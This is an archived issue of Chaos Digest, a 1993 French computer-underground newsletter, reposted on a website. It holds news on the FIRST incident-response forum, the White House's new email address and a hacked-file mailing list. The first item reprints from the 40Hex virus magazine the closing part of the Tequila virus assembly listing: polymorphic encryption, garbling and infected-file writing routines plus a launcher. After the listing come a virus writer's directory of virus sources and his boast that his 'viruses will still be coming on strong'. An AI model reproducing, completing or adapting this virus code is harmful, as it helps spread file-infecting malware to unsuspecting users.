Copy Link
Add to Bookmark
Report

Chaos Digest Volume 01 Numero 44

eZine's profile picture
Published in 
Chaos Digest
 · 4 years ago

  

Chaos Digest Mercredi 2 Juin 1993 Volume 1 : Numero 44
ISSN 1244-4901

Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
Archiviste: Yves-Marie Crabbe
Co-Redacteurs: Arnaud Bigare, Stephane Briere

TABLE DES MATIERES, #1.44 (2 Juin 1993)
File 1--40H VMag Issue 1 Volume 4 #012(2)-014 (reprint)
File 2--Adresse electronique de Bill Clinton (news)
File 3--FIRST, nouveau forum anti-hackers aux USA (lutte)
File 4--Liste de diffusion de _The Hack Report_ (abonnement)
File 5--Autre type de chaos (identification)

Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:
linux-activists-request@niksula.hut.fi
with a mail header or first line containing the following informations:
X-Mn-Admin: join CHAOS_DIGEST

The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299)
groups.

Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
466893. Back issues of ChaosD can be found on the Internet as part of the
Computer underground Digest archives. They're accessible using anonymous FTP:

* kragar.eff.org [192.88.144.4] in /pub/cud/chaos
* uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
* halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
* ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
* cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
* ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
* nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
* orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos

CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited.
Some authors do copyright their material, and they should be contacted for
reprint permission. Readers are encouraged to submit reasoned articles in
French, English or German languages relating to computer culture and
telecommunications. Articles are preferred to short responses. Please
avoid quoting previous posts unless absolutely necessary.

DISCLAIMER: The views represented herein do not necessarily represent
the views of the moderators. Chaos Digest contributors
assume all responsibility for ensuring that articles
submitted do not violate copyright protections.

----------------------------------------------------------------------

Date: Tue May 11 09:24:40 PDT 1993
From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Issue 1 Volume 4 #012(2)-014 (reprint)

[suite du listing du virus Tequila]


WRITE_THE_NEW_HEADER:
CALL 0696 ;Masm Mod. Needed
OUT_OF_ENCRYPT:
RET

COPY_TO_HIGH_MEMORY_ENCRYPT_WRITE:
PUSH BP
XOR AH,AH
INT 01A
MOV AX,DX
MOV BP,DX
PUSH DS
POP ES
MOV DI,0960
MOV SI,DI
MOV CX,020
CLD
REP STOSW
XOR DX,DX
MOV ES,DX
CALL ENCRYPT_STEP_ONE
CALL ENCRYPT_STEP_TWO
CALL ENCRYPT_STEP_THREE
MOV B[SI],0E9
MOV DI,028C
SUB DI,SI
SUB DI,3
INC SI
MOV W[SI],DI
MOV AX,0A04
CALL AX
POP BP
RET

ENCRYPT_STEP_ONE:
DEC BP
ES TEST B[BP],2 ;Masm Mod. Needed
JNE 08EB ;Masm Mod. Needed
MOV B[SI],0E
INC SI
CALL GARBLER
MOV B[SI],01F
INC SI
CALL GARBLER
RET
MOV W[SI],0CB8C
INC SI
INC SI
CALL GARBLER
MOV W[SI],0DB8E
INC SI
INC SI
CALL GARBLER
RET

ENCRYPT_STEP_TWO:
AND CH,0FE
DEC BP
ES TEST B[BP],2 ;Masm Mod. Needed
JE 0920 ;Masm Mod. Needed
OR CH,1
MOV B[SI],0BE
INC SI
MOV W[SI],BX
INC SI
INC SI
CALL GARBLER
ADD BX,0960
TEST CH,1
JE 0934 ;Masm Mod. Needed
MOV B[SI],0BB
INC SI
MOV W[SI],BX
INC SI
INC SI
CALL GARBLER
ADD BX,0960
TEST CH,1
JE 090C ;Masm Mod. Needed
SUB BX,0960
CALL GARBLER
MOV B[SI],0B9
INC SI
MOV AX,0960
MOV W[SI],AX
INC SI
INC SI
CALL GARBLER
CALL GARBLER
RET

ENCRYPT_STEP_THREE:
MOV AH,014
MOV DH,017
TEST CH,1
JE 0958 ;Masm Mod. Needed
XCHG DH,AH
MOV DI,SI
MOV AL,08A
MOV W[SI],AX
INC SI
INC SI
CALL GARBLER
XOR DL,DL
MOV B[0A39],028 ;Masm Mod. Needed
DEC BP
ES TEST B[BP],2 ;Masm Mod. Needed
JE 0978 ;Masm Mod. Needed
MOV DL,030
MOV B[0A39],DL ;Masm Mod. Needed
MOV W[SI],DX
INC SI
INC SI
MOV W[SI],04346
INC SI
INC SI
CALL GARBLER
MOV AX,0FE81
MOV CL,0BE
TEST CH,1
JE 0993 ;Masm Mod. Needed
MOV AH,0FB
MOV CL,0BB
MOV W[SI],AX
INC SI
INC SI
PUSH BX
ADD BX,040
MOV W[SI],BX
INC SI
INC SI
POP BX
MOV B[SI],072
INC SI
MOV DX,SI
INC SI
CALL GARBLER
MOV B[SI],CL
INC SI
MOV W[SI],BX
INC SI
INC SI
MOV AX,SI
SUB AX,DX
DEC AX
MOV BX,DX
MOV B[BX],AL
CALL GARBLER
CALL GARBLER
MOV B[SI],0E2
INC SI
SUB DI,SI
DEC DI
MOV AX,DI
MOV B[SI],AL
INC SI
CALL GARBLER
RET

GARBLER:
DEC BP
ES TEST B[BP],0F ;Masm Mod. Needed
JE RET ;Masm Mod. Needed
DEC BP
ES MOV AL,B[BP] ;Masm Mod. Needed
TEST AL,2
JE 0A0E ;Masm Mod. Needed
TEST AL,4
JE 09F7 ;Masm Mod. Needed
TEST AL,8
JE 09F1 ;Masm Mod. Needed
MOV W[SI],0C789
INC SI
INC SI
JMP RET ;Masm Mod. Needed
MOV B[SI],090
INC SI
JMP RET ;Masm Mod. Needed
MOV AL,085
DEC BP
ES MOV AH,B[BP] ;Masm Mod. Needed
TEST AH,2
JE 0A05 ;Masm Mod. Needed
DEC AL
OR AH,0C0
MOV W[SI],AX
INC SI
INC SI
JMP RET ;Masm Mod. Needed
DEC BP
ES TEST B[BP],2 ;Masm Mod. Needed
JE 0A1A ;Masm Mod. Needed
MOV AL,039
JMP 09F9 ;Masm Mod. Needed
MOV B[SI],0FC
INC SI
RET

MAKE_THE_DISK_WRITE:
CALL PERFORM_ENCRYPTION_DECRYPTION
MOV AH,040
MOV BX,W[09A4]
MOV DX,0
MOV CX,09A4
PUSHF
CALL D[09B4] ;Masm Mod. Needed
JB 0A37 ;Masm Mod. Needed
SUB AX,CX
PUSHF
CMP B[0A39],028 ;Masm Mod. Needed
JNE 0A44 ;Masm Mod. Needed
MOV B[0A39],0 ;Masm Mod. Needed
CALL PERFORM_ENCRYPTION_DECRYPTION
POPF
RET

PERFORM_ENCRYPTION_DECRYPTION:
MOV BX,0
MOV SI,0960
MOV CX,0960
MOV DL,B[SI]
XOR B[BX],DL
INC SI
INC BX
CMP SI,09A0
JB 0A61 ;Masm Mod. Needed
MOV SI,0960
LOOP 0A52 ;Masm Mod. Needed
RET

THE_FILE_DECRYPTING_ROUTINE:
PUSH CS
POP DS
MOV BX,4
MOV SI,0964
MOV CX,0960
MOV DL,B[SI]
ADD B[BX],DL
INC SI
INC BX
CMP SI,09A4
JB 0A7E ;Masm Mod. Needed
MOV SI,0964
LOOP 0A6F ;Masm Mod. Needed
JMP 0390 ;Masm Mod. Needed

;========== THE FOLLOWING IS NOT PART OF THE VIRUS ========
;========== BUT IS MERELY THE BOOSTER. ========

START:
LEA W[0104],EXIT ;Masm Mod. Needed
MOV W[0106],CS ;Masm Mod. Needed
MOV BX,CS
SUB W[0106],BX ;Masm Mod. Needed
JMP INSTALL

EXIT:
INT 020

TEQUILA ENDP
CODE_SEG ENDS
END TEQUILA

+++++

40Hex Issue 4 December 1991

Left Blank
Cause its bad
luck
how about something real dumb like....


Directory of C:\TASM

. <DIR> 11-28-91 11:44a
.. <DIR> 11-28-91 11:44a
LAB <DIR> 12-10-91 8:45p
1605 ASM 38553 12-09-91 12:31p
911 ASM 19267 12-10-91 7:21p
911 SDF 7084 12-10-91 10:41p
BBRAINS ASM 8990 08-06-91 3:04p
BMONDAY ASM 21455 12-09-91 12:31p
BOBVIRUS ASM 21280 12-14-91 4:38p
BRU_TEST COM 11 12-16-91 1:52p
CANCER ASM 2600 02-09-91 12:38a
DARTH2 ASM 8938 12-09-91 11:50a
DEADPOOL ASM 5324 12-14-91 1:00a
DIR2SCAN ASM 892 12-22-91 1:17a
DIR2SCAN COM 112 12-22-91 1:17a
EMFII ASM 16755 12-08-91 10:55p
FILES DOC 2373 12-11-91 9:58a
FUNNY ASM 5807 12-18-91 12:46p
FUNNY COM 208 12-18-91 12:46p
GREP DOC 13619 03-13-91 2:02a
HAPPY ASM 5667 12-18-91 12:32p
HAPPY MAP 34 12-25-91 11:27a
HEADER 94 12-09-91 10:25a
JOKER ASM 16258 11-10-91 10:55p
KILL-FSP ASM 1475 11-12-91 4:28p
KILL-FSP COM 55 12-25-91 11:26a
KILL-FSP EXE 823 12-25-91 11:26a
KILL-FSP MAP 103 12-25-91 11:26a
KILL-FSP OBJ 195 12-25-91 11:26a
MAKE EXE 37056 03-13-91 2:02a
MANUAL DOC 52126 03-13-91 2:02a
MBIOS MAC 13380 03-13-91 2:02a
MG-1 ASM 4527 12-17-91 10:58a
MG-1 SDF 2319 12-17-91 10:58a
NAILME ASM 206 12-18-91 10:01p
NAILME COM 100 12-19-91 10:26a
OBJXREF DOC 18404 03-13-91 2:02a
PARITY ASM 5837 12-09-91 12:49p
PH-VIR1 TXT 22086 11-04-91 9:00p
PROLOG DOC 23811 03-13-91 2:02a
RAGE ASM 9335 11-29-91 12:17p
SR EXE 117543 10-30-89 8:00a
SURVEY DOC 4479 11-29-91 1:01p
TASM EXE 106521 03-13-91 2:02a
TASM TAH 167927 03-13-91 2:02a
TCREF DOC 4954 03-13-91 2:02a
TCREF EXE 7856 03-13-91 2:02a
TD EXE 409360 03-13-91 2:02a
TDCONFIG TD 1208 12-06-91 12:01p
TDCONVRT EXE 35366 03-13-91 2:02a
TDDEV EXE 8544 03-13-91 2:02a
TDHELP TDH 126541 03-13-91 2:02a
TDINST EXE 107638 03-13-91 2:02a
TDMAP EXE 16944 03-13-91 2:02a
TDMEM EXE 14256 12-24-91 8:19p
TDNMI COM 644 03-13-91 2:02a
TDPACK EXE 25520 03-13-91 2:02a
TDREMOTE EXE 20738 03-13-91 2:02a
TDRF EXE 17376 03-13-91 2:02a
TDSTRIP EXE 13868 03-13-91 2:02a
TDUMP EXE 70554 03-13-91 2:02a
THELP COM 9912 11-28-91 11:46a
THELP DOC 7619 03-13-91 2:02a
TINY ASM 4233 01-01-80 12:26a
TINY TXT 92 01-01-80 12:25a
TINYB ASM 4404 01-01-80 12:32a
TINYB TXT 89 01-01-80 12:31a
TINYC ASM 4669 01-01-80 12:14a
TINYC TXT 118 01-01-80 12:31a
TINYD ASM 5486 01-01-80 12:02a
TINYE ASM 6464 01-01-80 12:09a
TLIB EXE 35668 03-13-91 2:02a
TLINK DOC 3837 03-13-91 2:02a
TLINK EXE 53510 03-13-91 2:02a
TOUCH COM 5118 03-13-91 2:02a
UPDATE DOC 20266 03-13-91 2:02a
VIENNA ASM 26395 09-30-87 12:59a
VIOL-C ASM 19096 12-16-91 10:25p
VSAFE COM 32050 03-28-91 1:00p
VWATCH COM 12263 03-28-91 1:00p
WIN COM 19358 12-24-91 9:52p
WINFIX ASM 2603 12-21-91 8:18p
WINFIX COM 357 12-24-91 9:52p
WINFIX MAP 103 12-24-91 9:52p
WINFIX OBJ 553 12-24-91 9:52p
85 file(s) 1939259 bytes

Directory of C:\TASM\LAB

. <DIR> 12-10-91 8:45p
.. <DIR> 12-10-91 8:45p
LAB <DIR> 12-10-91 8:46p
AMAG0589 TXT 46529 05-21-89 7:06p
AMAG1289 TXT 113270 12-16-89 12:21p
BIT ASM 778 08-30-91 8:33p
BIT MAP 103 12-24-91 11:31p
BIT OBJ 192 12-24-91 11:31p
BUGOFF ASM 903 12-25-91 11:59a
BUGOFF COM 43 12-25-91 11:59a
BUGOFF MAP 103 12-25-91 11:59a
BUGOFF OBJ 198 12-25-91 11:59a
CRACK-W ASM 1430 12-24-91 7:49p
CRACK-W MAP 103 12-24-91 7:47p
DIR ASM 10274 12-25-91 12:46a
DIR MAP 99 12-25-91 12:48a
DIR OBJ 961 12-25-91 12:48a
DIR SDF 5032 12-25-91 12:46a
DL ASM 416 12-14-91 6:35p
DUMB DOC 52346 12-19-91 1:46p
ENW 3 12-19-91 6:02p
EXE_FILE ASM 80 12-24-91 12:36a
EXE_FILE EXE 516 12-24-91 12:36a
EXE_FILE MAP 220 12-24-91 12:36a
EXE_FILE OBJ 183 12-24-91 12:36a
FUCK_UP DOC 198 12-23-91 10:33a
FUNGUS ASM 17120 12-21-91 1:37p
FUNGUS SDF 4933 12-21-91 1:34p
HAP ASM 2440 12-16-91 12:42p
HAPPY ASM 7144 12-25-91 11:30a
HAPPY COM 248 12-25-91 11:28a
HAPPY MAP 99 12-25-91 11:28a
HAPPY OBJ 424 12-25-91 11:28a
HEADER 94 12-09-91 10:25a
KENNEDY ASM 6663 12-25-91 12:43a
KENNEDY SDF 2803 12-25-91 12:43a
KILL ASM 517 12-19-91 6:05p
MAR-INST BAT 205 08-31-91 12:13a
MAR-INST DOC 1037 08-31-91 12:20a
MARAUDER ASM 21997 12-23-91 10:21a
MARAUDER DOC 2305 12-20-91 9:40a
MAR_ASM! ZIP 5361 12-23-91 10:35a
MODES ASM 244 12-25-91 7:22p
MODES COM 7 12-25-91 7:22p
MODES MAP 99 12-25-91 7:22p
MODES OBJ 136 12-25-91 7:22p
NEW ASM 21997 12-23-91 10:21a
NEW COM 869 12-25-91 12:12a
NEW MAP 103 12-25-91 12:12a
NEW OBJ 1261 12-25-91 12:12a
NEW_KILL ASM 1318 12-23-91 10:29a
NEXT ASM 2208 12-25-91 12:41a
PS ANS 3218 11-25-91 9:43p
SECTOR ASM 1573 12-11-91 10:52p
SS DOC 270 08-08-91 3:00p
SS EXE 6898 08-08-91 3:00p
TARGET ASM 472 12-20-91 3:32p
TARGET COM 100 12-25-91 8:53p
TARGET MAP 103 12-25-91 8:53p
TARGET OBJ 261 12-25-91 8:53p
60 file(s) 348507 bytes

Directory of C:\TASM\LAB\LAB

. <DIR> 12-10-91 8:46p
.. <DIR> 12-10-91 8:46p
2 file(s) 0 bytes

Total files listed:
147 file(s) 2287766 bytes
1843200 bytes free

+++++

40Hex Issue 4 December 1991

Is This The End?
++++++++++++++++

Well, to be honest. I'm kind of tired writing this magazine. It's
not like I hate it or anything, it's just too much pressure for one
person to handle. Decimator helped me out a bit with a few articals
and such. But still every time I do an issue it's me who does the
marjority of the work. It seems the magazine is bigger than I
thought. It seems to be on everybodys BBS from NY to California,
from Canada to Europe. The thing is I can't write this thing by
myself anymore. I work everyday from 2pm - 10pm and I will be going
back to school next semester. So I don't have time to handle all the
things I do. So in the long run the magazine suffers. Anyway,
unless people want to help out (mabey the reason is that I haven't
really asked before) lemme know. Contact me on Digital Warefare.
The numbers in an artical in this issue somewhere I'm sure. Anyway,
fuck it, If people don't contribute soon this may well be the last
issue of this rag ever. So whatever happens in 1992, we shall see.
So if this is it, later people. My viruses will still be coming on
strong as always...

Later
Hellraiser 12/26/91

------------------------------

Date: Thu Jun 3 01:48:14 -0400 1993
From: postmaster@whitehouse.gov
Subject: File 2--Adresse electronique de Bill Clinton (news)

[ChaosD: Voici la reponse recu a un courrier envoye ce matin au President
des Etats-Unis sur sa nouvelle messagerie ouverte le premier du mois:
President@WhiteHouse.gov.]


Thank you for sending in your thoughts and comments to the
President via electronic mail. We are pleased to introduce this
new form of communication into the White House for the first time
in history. I welcome your response and participation.

As we work to reinvent government and streamline our
processes, this electronic mail experiment will help put us on
the leading edge of progress. Please remember, though, this is
still very much an experiment.

Your message has been read, and we are keeping careful track
of all the mail we are receiving electronically. We will be
trying out a number of response-based systems shortly, and I ask
for your patience as we move forward to integrate electronic mail
from the public into the White House.

Again, on behalf of the President, thank you for your
message and for taking part in the White House electronic mail
project.

Sincerely,

Marsha Scott, Deputy Assistant
to the President and Director
of Correspondence

------------------------------

Date: May 29, 1993 08:47:48 GMT
From: gregory@email.teaser.com (Gregory Noe )
Subject: File 3--FIRST, nouveau forum anti-hackers aux USA (lutte)
Copyright: Worldwide Videotex & The Baltimore Sun, 1993


RESPONSE GROUP FORMED TO HANDLE INTERNATIONAL COMPUTER AND NETWORK SECURITY
PROBLEMS
Mainframe Computing May 00, 1993 V. 6 NO. 5 p. 1

Government and private organizations in North America and Europe are
joining forces to help combat and prevent the world's escalating computer
and network security problems.

Known as the *Forum of Incident Response and Security Teams*, or
FIRST, the coalition brings together a variety of computer security
incident response teams from the public and private sectors, as well as
from universities. FIRST aims to foster cooperation and coordination in
incident prevention, to prompt rapid reaction to incidents, and to promote
information sharing among its members. FIRST currently includes more than
20 response teams and liaisons (see attached list of participating
organizations).

Participation in FIRST is voluntary, and member teams must fund their own
involvement. One of FIRST's chief goals is to expand the number of
participating incident response teams and to foster increased cooperation
in incident response-related activities.

In general, a response team is set up to serve a defined constituency. In
many cases, a team serves a single organization's computer network users.
Other teams are operated by computer vendors and deal primarily with their
specific operating systems. Incident response teams generally augment an
organization's overall computer security efforts by focusing on computer
security incidents.

The FIRST Secretariat is responsible for various administrative and
coordination activities. The National Institute of Standards and Technology
serves as the secretariat.

"Computer security vulnerabilities associated with information technology,
such as malicious abuse or viruses, require a rapid, skilled and
coordinated response to minimize damage," said Dennis Steinauer, who
oversees NIST's participation in FIRST and chairs the FIRST Steering
Committee. "For a response team to be effective, it must have rapid
communication both within its own constituency and with other incident
response teams. That's what FIRST aims to accomplish." FIRST members, he
said, use automatic alerting mechanisms, electronic mail and a number of
other methods to achieve this rapid communication.

FIRST is working to achieve several goals:

* To boost cooperation among information technology users in the effective
prevention, detection and recovery from computer security incidents;

* To provide a means to alert and advise clients on potential threats and
emerging incident situations;

* To support and promote the actions and activities of participating
incident response teams, including research and operational activities; and

* To simplify and encourage the sharing of security-related information,
tools and techniques.

FIRST membership has grown quickly from 11 original teams to more than 20.
Although initial membership consisted primarily of U.S. government
organizations, membership of private-sector organizations, universities and
non-U.S. organizations is growing. Many are finding that FIRST
participation offers extensive information and help in combating and
preventing computer security incidents. FIRST officials state, however,
that members are expected to participate actively in the forum. The FIRST
Secretariat can provide information on establishing an incident response
capability and on FIRST membership.

For more information, contact:

FIRST Secretariat
Attn: Dennis Steinauer
National Institute of Standards and Technology
A216 Technology Building
Gaithersburg, MD 20899-0001
Phone: (301)975-3359
Electronic Mail: first-sec@nist.gov.

+++++

COMPUTER SECURITY EXPERTS ON THE ALERT
BALTIMORE MORNING SUN (BS) - Monday, May 24, 1993
By: Steve Auerweck Staff Writer
Edition: Final Section: Financial Page: 12C


On Nov. 2, 1988, Robert Morris, a Cornell University graduate student from
Arnold, set loose a "worm" that soon disabled thousands of computers on the
Internet, an enormous but loose conglomeration of computers nationwide.

Not long afterward, a group of computer security experts meeting at the
National Security Agency headquarters at Fort Meade to discuss the disaster
laid the groundwork for FIRST, the *Forum of Incident Response and
Security Teams.

FIRST, coordinated out of the National Institute of Standards and
Technology offices in Gaithersburg, is a coalition of computer security
response teams from both the public and private sectors.

Dennis Steinauer, chairman of the FIRST steering committee, describes
the need this way: "As more and more organizations get themselves hooked up
to networks . . . the threat population has increased, or at least the
avenues of exposure."

So FIRST now brings together a variety of outfits that might need to
respond swiftly to security threats. They range from teams at the Defense
Department to US Sprint, the Space Physics Analysis Network in France and
the Government Centre for Information Systems in the United Kingdom.

The idea is to provide swift communication among members about current
or potential problems, such as computer viruses or virulent hackers.

"We're not a professional or educational organization," Mr. Steinauer
says. "This is an operational activity."

Their main avenue of communication is the Internet, but they also
learned a lesson in 1988. "We have backup methods in place that we test
from time to time," Mr. Steinauer says, "including the telephone."

FIRST is contemplating staging "a fairly extensive drill"; it has not
yet been challenged by any major incidents.

COMPUTER SCIENCES LAB WINS DEFENSE CONTRACT

Computer Sciences Corp. learned last week that its Network Security
Integration Laboratory, located near Fort Meade, won a $19.9 million,
four-year contract to provide information security services to the Defense
Department.

The laboratory works with the National Computer Security Center, which
is affiliated with the NSA. The Anne Arundel lab averages 40 workers,
supported by another 60 at CSC's Systems Engineering Division in Falls
Church, Va. No new positions are anticipated here.

CSC, headquartered in El Segundo, Calif., had received a $6 million
contract for the first phase of the project last October.

Its security laboratory evaluates encryption devices built for computer
networks, telephones, fax machines and the like, and helps users put them
to work in specific applications. It also tests security systems and builds
mock-ups for Defense Department projects.

DIGITAL OFFERS $5,000 TO BREAK V-CARD SYSTEM

Digital Enterprises Inc. of Gaithersburg has a challenge for hackers:
Break its anti-virus scheme and win $5,000.

The company sells a hardware/software protection system called V-Card.
If you can beat the machine at its headquarters -- no Trojan horses or
bombs allowed, the company says -- you'll win the prize.

Enterprising hackers can call Digital at (301) 926-6937.

MICROPROSE GAMES HEADED FOR CD FORMATS

Hunt Valley's MicroProse Software Inc. has licensed several of its most
popular game titles to Capitol Multimedia Inc. for release in two new
mass-market compact disk formats. The Washington company will develop,
market and distribute the games for CD-I (CD-Interactive) and Sony CD-ROM
XA machines.

The titles covered by the worldwide pact are Sid Meier's Pirates,
Railroad Tycoon and Civilization, as well as Silent Service and Airborne
Ranger.

WAVERLY TO DISTRIBUTE DAROX VIDEODISCS

Waverly Inc.'s Electronic Media Division will be the exclusive
distributor of interactive videodiscs put out for nursing schools by Darox
Corp. of La Jolla, Calif.

Darox now has 32 titles for health professionals, with more being
developed. They join other Waverly products for medical instruction, such
as the Medi-Sim computer-assisted instruction programs and a line of
videos.

MAGAZINE SEEKS COMPUTER NIGHTMARES

Has your computer driven you right to the edge? Are you ready to hire a
disgruntled postal worker to blast the thing to smithereens? Do you long to
fold, spindle and mutilate?

Put those problems on paper and you may win a restful weekend in
California, courtesy of San Diego's ComputorEdge Magazine.

Its Computer Dementia Contest seeks a 1,000-word essay on your worst
computer nightmare. The most horrid wins a weekend out West.

"We have a couple hundred entries so far," said the magazine's Kevin
Leap. "Some are pretty hilarious. There was a guy who got Doritos stuck in
the keyboard and woke up the next morning with 220,000 pages of the letter
'E.' "

Send entries to P.O. Box 83086, San Diego, Calif. 92138. The deadline is
July 31.
--
*-*-*-*-*-*-*-*-*-*-*-*-*-*- gregory@email.teaser.com
- Gregory NOE * ________________________
* PARIS (France) -
-*-*-*-*-*-*-*-*-*-*-*-*-*-*

------------------------------

Date: 10 May 1993 03:17:51 GMT
From: doug@cc.ysu.edu (Doug Sewell )
Subject: File 4--Liste de diffusion de _The Hack Report_ (abonnement)


The Hack Report List

[hack@alive.ersys.edmonton.ab.ca]

The Hack Report is a monthly informational newsletter put out by Lee
Jackson, Co-Moderator of the FidoNet International SHAREWRE echo and
Moderator of the FidoNet WARNINGS echo which warns of hacked, hoax,
Trojan Hourse, and pirated files that have been seen posted on BBS
systems worldwide. It is mainly MS-DOS oriented, although it does
have a few notes on programs for other computer platforms. It is a
great aid for anyone who downloads files from a public access system.

There are many people who do not get quack, or any, access to the
latest version of the essential report. This mailing list has been
created to allow fast efficient distribution of The Hack Report to
people with an Internet mail address who do not have easy access to
it via other means such as anonymous FTP or through FidoNet. This is
a one-directional list soley for the distribution of The Hack Report
each month.

To subscribe to The Hack Report mailing list, please send requests to
the human monitored address hackalive.ersys.edmonton.ab.ca.

Owner: Marc Slemko <marcs@alive.ersys.edmonton.ab.ca>
--
Doug Sewell, Tech Support, Computer Center, Youngstown State University
doug@cc.ysu.edu doug@ysub.bitnet <internet>!cc.ysu.edu!doug

------------------------------

Date: Mon May 31 23:47:20 -0700 1993
From: park@netcom.com (Bill Park )
Subject: File 5--Autre type de chaos (identification)

> that present some security aspects: frauds, hacking, swapping,
> legislation, phreaking...

Ooops! Sorry, I though the journal was about the nonlinear dynamic systems
kind of choas.

Never mind,
Bill Park
=========

------------------------------

End of Chaos Digest #1.44
************************************

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT